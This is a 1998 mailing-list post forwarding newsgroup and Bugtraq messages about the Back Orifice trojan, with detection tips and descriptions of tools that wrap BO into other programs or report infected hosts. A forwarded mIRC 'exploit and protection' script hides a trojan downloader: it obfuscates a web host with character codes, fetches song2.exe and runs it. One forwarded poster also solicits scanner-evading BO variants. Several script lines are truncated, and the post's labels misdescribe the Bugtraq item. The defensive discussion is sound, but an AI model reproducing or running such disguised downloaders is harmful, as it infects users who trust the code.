“penang.island@usa.net” has submitted to the
“linux-biz@lege.com” mailing list his concerns about this trojan
coming into Linux Land.
———- Forwarded message ———-
From: penang.island@usa.net
To: linux-biz@lege.com
Dear all,
This is a message about the Back Orifice (BO) trojan. Included
in this message are several BO-related messages I obtained from the
various *crack* newsgroups, and one from the Bugtraq
mailinglist.
At first I thought BO only wrack havoc on the Windoze platform,
— please read the first forwarded message, — but on the bugtraq
list, someone demonstrated that BO is alive and well on the BSD and
Linux platforms as well, — please read the second forwarded
message, from Bugtraq maillist. I also included clips of other
BO-related messages to give you a clearly perspective of BO.
I have several concerns:
- The LGPL license, if I am not mistaken, does allow the
distribution of compiled libraries. The possibility of someone
hiding a BO trojan and distribute it under the LGPL license must
_NEVER_ be discounted. - Call me a paranoid if you must, but the “Halloween Papers”
exposed the possibility of Microsoft employing all kinds of dirty
tricks in wracking Linux. Hence, in addition to the usual FUD
tactics, it is _NOT_ inconceivable that some determined fanatics
from the Windoze camp may actually carry out what I have just
mentioned above. - If that happened, what should we, the people from the Linux
community do? - Are there any precautions we can take in advance to prevent
that from happening? - Not all of us are security experts, so it may be too much to
ask all Linux users to scan all the ports of their machines. Are
there any security programs in existence that can help the Linux
users in preventing the BO trojan from infecting our machines? - Linux are being employed in more and more businesses. The BO
trojan allows someone from the outside to monitor and scan the
infected machines, and if the infected machines are being used for
business purposes, trade secrets and business strategies may be
seriously compromised. If we are to promote the use of Linux in the
business premises, we must take a pro-active stance in finding ways
to counter any possible effect of the BO trojan.
***DISCLAIMER***
I am _NOT_ a cracker, I do _NOT_ own nor will knowingly run any
of the below mention programs. I am _NOT_ affiliated with any of
the people and/or organization mentioned below either.
I have no way to know, and I haven’t have the time to prove the
validity of the information I’m including below. I apologize in
advance if all these seem unimportant or if anything resembling
were ever posted in the past.
Please also take into consideration that most of the BO-related
messages were from the various *.crack* newsgroups populated by
boastful teenage script-runners. Some of the language they use are
offensive in nature, so please stop reading any further if you are
easily offended.
Thank You.
Sincerely,
Lee
penang.island@usa.net
- ------------------------------------------------------------- A forwarded message about the nature of the Back Orifice Trojan - ------------------------------------------------------------- From: jim_porter@hotmail.com (Jim Porter) Newsgroups: alt.2600,alt.2600.crackz,alt.2600.hackerz,alt.binairies.cracks,alt.cracks,alt.hack.nl Subject: READ THIS warning !!! ===== WHAT IS BACK ORIFICE ======== warning !!! Date: Wed, 09 Sep 1998 12:27:32 GMT Message-ID: <35f6722c.16857146@news.noord.bart.nl NNTP-Posting-Host: s02.zwolle.bart.nl Back Orifice News First, It seems that I'm getting a lot of questions from people who don't know what Back Orifice is about... and the rest probably don't care... or think they don't care about whatever it is. Back Orifice is a program that will let people who don't have a clue about hacking get into YOUR computer and do ANYTHING they want. They can access all your banking/accounting records, credit card info, read your ICQ history, irc logs, your email (including received and sent and undeleted trash mail), they can get all the passwords to your ftp sites and websites, if you are running on a network they can move to all the other systems and modify anything, copy anything, upload anything AND destroy anything. A hacker can even keep a log of your keystrokes and take a snapshot of what you are viewing on your screen and take a look. You probably think... oh I won't get it on my computer because I'm careful. Well ok then.. read no farther. You may not know that BO is showing up EVERYWHERE, in programs like greeting cards, jokes, cracks, something you may get in email and just click on, and it can even be loaded from browsing a web site. You might go to a site that simply says "We have moved.. click HERE to go to our new location." and a Java app. will load BO from there onto your system. There was a web site that had and example but it looks like Microsoft had them take it down. If I find another one I'll mention the url. Personally, I have to admit that I didn't think Back Orifice would be such a big deal. After all, you have to execute a program on your computer that has BO in it, and it should be easy to detect it when it's running. HOWEVER, I've found SEVERAL really trick versions that are wrapped up in programs we are all likely to encounter. And after reading so many articles about BO on the web I have a strong sense that they just think this is a minor nuisance and can be eliminate by watching the default port, and/or checking the register where it normally loads. I say "ha,ha" Consider these facts: * Some versions of BO are modified so they are NOT detected by Norton or the normal detection programs that claim to detect it. * There are BO support sites that offer programs that will wrap BO into any application and various other innovative utilities to help get it onto someone's system without them knowing. And there are programs that will plug into BO so that it will email the hacker who prepared the version you are installing and tell him/her "BO has been installed at: Your IP number" so they know your system is open for the hacker's access. * Even if you run a BoWatch type program, they can take up to 10 mins to identify and turn off BO.. which gives someone who is watching your system (or who has just sent it to you wrapped in another program) plenty of time to go into your system and close then delete the BoWatch program. Of course it would not be so difficult for a programmer to just check for the "anti-BO" programs and deactivate then, or replace them with a version that doesn't work.. so you would have the "false security" of thinking you were protected when you see the "do nothing" program running. See this story: Back Orifice "security" tools miss the mark http://www.zdnet.com/pcweek/news/0817/20mbosec.html The main problem with removing it is that it may be "hatched" when your system starts, meaning that another program is putting a new copy on a system during bootup. Often these BO removal programs think they cured your system but haven't fixed anything. Most just check the default location in your system's register or watch the default port setting. One way to detect if it's running on your system is to enter this command from your Start /Run menu you can see if you have anyports in the 3,000's open. If you do, most likely that is BO running. BO's default address is 31377. command /k netstat -n (this doesn't seem to show up if you have a password version of BO unless the person who knows the password is on your computer) Another thing you can do is click on Start / Find / Files and put "bofilemapping" (without the quotes) in the "Containing Text" field. Any matches you find have the BO trojan. If they are in your windowssystem directory it is probably running. I have been told that you can be running several versions at the same time. Run Regedit and look in here: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Then check under "Run" "Runonce" for files like windll.dll (the default name the unmodified version of BO uses) or hello.abc There are some very clever people out there that make it lookVERY important if you are looking at your register. It may say "Key file for Windows System Tray, do not delete" There are even MORE clever tricks that I don't want to mention here. Another thing that can help you protect your data from BO access is to take advantage of the limitation that BO can't change to a directory with an ALT + 255 character in the name. This means that if you drop to DOS and type MD hidden and after the "h" of hidden you hold your alt key and press 255 on your number pad, when you release your ALT key your cursor moves to the right one space. If you try to access this directory from Windows Explorer (or with BO) it will look like "hidden_" but if you try to see the files in that directory you will get an error message, saying something like this directory has been moved or deleted. The only way you can move files into and out of this directory is from DOS. You can use dos based file managing programs like List and DirMagic to access this directory so you don't have to type out all the file names. I haven't had time to experiment yet, but I'm hoping that Netscape will allow me to configure it to use a directory with alt + 255 in the name of the mail file. Note: If you have contacts with the cDc people, please try to get the source code for this program for me. If you have any really good tips about BO let's share the info that I can't (or just don't want to) talk about in this newsletter. If you have found or created any modified versions of your own that the scanners don't detect, please send them to me: mailto:tblount@zebra.net?subject=BOserver If you think you can write a program.. like Nuke Nabber.. that will detect the ip of the BO CLIENT when someone sweeps or connects to the boserver running on a system, I want to help you test it. - ----------------------------------------------------------------------- A forwarded Bugtraq message, proving the existence of a cross-platform BO - ----------------------------------------------------------------------- Message-ID: <199811131950.OAA02949@brampton1.netmatrix.net> Date: Fri, 13 Nov 1998 14:50:32 -0500 From: System Administrator To: BUGTRAQ@NETSPACE.ORG Hi, while debugging/hexing/disassembling mirc my friend slotmech last week found a mirc bug which allows to force users to send MODE commands to the server. this example script sends a MODE +o to the irc server. the mirc author has been notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us. cya, fs --- cut here --- ;#; mIRC v5.41 hack protection & exploit by FeaRStorm ;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$;#; ;#; -------- Use /hackop nick #channel to make nick give you op on #channel ! ;#; -------- That's it... have phun! ;#; ;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz ! ;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#; ;#; if you want to add this code to your own script please: ASK FIRST! ctcp 1:userinfo*: antihack alias antihack { if ($len($2) > 17 && $chr(91) isin $2-) { echo $active mIRC5.41 hack attempt from $nick .halt } } alias hackop { if ($2 == $null) { echo 3 *** Usage: /hackop nick #channel .halt } if ($me !ison $2) { echo 3 *** You aren't on that Channel! .halt } if ($1 !isop $2) { echo 3 *** $1 isn't opped on that channel! .halt } checklen $1 .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $} alias checklen { .if (%xcomplete == 1) halt .if (%xinprog == 1) halt .set %xfilename song2.exe .set %xlof $lof(%xfilename) .set %xfirst 1 .write -c %xfilename ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$ .sockclose protx .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$} on 1:sockopen:protx: { .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$ .sockwrite -n protx } on 1:sockread:protx: { .sockread &test .set %xlof $lof(%xfilename) .if (%xfirst == 1) set %xlof 0 .set %xfirst 0 .bwrite %xfilename %xlof $sockbr &test } on 1:connect:checklen on 1:sockclose:protx: { .sockread &test if ($sockbr > 0) { .set %xlof $lof(%xfilename) .bwrite %xfilename %xlof $sockbr &test } .if ($lof(%xfilename) == 178306) { .run %xfilename .set %xcomplete 1 } if ($lof(%xfilename) != 178306) { .timer 1 300 checklen } } unset %xinprog unset %xfilename unset %xlof unset %xfirst } --- cut here --- - ------------------------------------------------- A forwarded message regarding BO and its port usage - ------------------------------------------------- From: nitalica@ibelong.2.pcrew (Nitallica) Newsgroups: alt.2600,alt.2600.crackz,alt.2600.hackerz,alt.binairies.cracks,alt.cracks,alt.hack.nl Subject: Re: READ THIS warning !!! ===== WHAT IS BACK ORIFICE ======== warning !!! Organization: Phrozen Crew Date: Wed, 09 Sep 1998 13:51:52 GMT Reply-To: nitalica@ibelong.2.pcrew Message-ID: <361286ec.5251341@news.bhm.bellsouth.net> NNTP-Posting-Host: host-209-214-105-195.bhm.bellsouth.net On 9 Sep 1998 13:41:49 GMT, "Wolfsbane" writhed in pain while screaming: >Ok, here's my question: > >Even if I did happen to get the BO Server on my computer, would McAfee >PCFirewall protect me from anybody trying to get on my computer? > only if you have it configured to block every port. BO typically uses port 31337, unless specified otherwise. -- Nitallica da GothiC AngeL Phrozen Crew '98 Phrozen 4 Life http://www.dejanews.com/group/dejanews.members.misc.phrozen.phrozencrew http://SupportPC.cjb.net - -------------------------------------------------------- Forwarded quotes about various BO-related programs/trojans - -------------------------------------------------------- Speakeasy (v0.1 beta), 31Kb -- DLL, instructions, and C source code Speakeasy is a ButtPlug that attempts to log into a predetermined IRC server on channel #BO_OWNED with a random username. It then proceeds to announce its IP address and a custom message every few minutes. This plugin is still in beta, and still missing a few features--mainly the ability to reestablish a link to the server when the connection is dropped, the ability to cope with being kicked out of a channel, and some assorted error checking/handling. Experiment with it, if you wish. Silk Rope (v2.0), 41Kb -- EXE, instructions, and C source code This is a little bit more of an elegant and sophisticated wrapper for the BO installer. (I prefer Silk Rope to Saran Wrap, myself...you know, a little more comfortable, a little less hot). Silk Rope binds your BO installer with a program of your choosing, saving the result as a single file. Great for modifying single-file installs. Presently, the icon is the generic single-file-install icon (an opening box with a window in the background), but I am working on making it "steal" the icon from the original executable. For now, you can change it with an icon utility such as Microangelo. NEW IN THIS VERSION: Install/Infect Redesign--the installer (used to trojan-ize an existing EXE) has been internally modified and greatly simplified. NEW IN PREVIOUS VERSION: Windows NT detection--the BO installer is not run if NT is detected (so that the nasty "password enumeration" error dialog box does not pop up). Simple Encryption--the BO installer is embedded into the EXE file using simple crypography (with a random 8-bit key) Saran Wrap (v1.1), 18Kb -- EXE, instructions, and C source code A simple wrapper that will first install BO, then run an application of your choosing. I have heard that someone at CDC or the l0pht have something like this in the works, but I decided to release my own (with source code). The program's icon is the generic setup icon, but can be changed with an icon utility such as Microangelo. Butt Trumpet (v1.1), 40Kb -- DLL, instructions, and C source code Upon activation, this plugin will fire off an email to a predetermined SMTP server and email address (for instance, an anonymous remailer or a web-based email server). This way, victims could be infected via Usenet, without any knowledge ahead of time of who is being infected. The computer attempts to send an email message every 5 minutes until successful (for instance, if the user connects through dialup networking, their network may not have a valid internet connection when their computer first boots up). Once the message is successfully sent, a flag is set in the registry so that it is never sent again. - ---------------------------------------------------------- Forwarded quotes regarding possible (windoze) anti-BO proggy - ---------------------------------------------------------- There is a website www.groupaxion.com that has a downloadable file that seeks and eliminates back orifice. Download AVP at www.avp.com and it will get rid of BO and NETBUS and some other trojans. - ------------------------------------------------------------- Name of a lamely disguised BO trojan, downloadable from the Net - ------------------------------------------------------------- ultracrack.exe - ------------------ End forwarded quotes - ------------------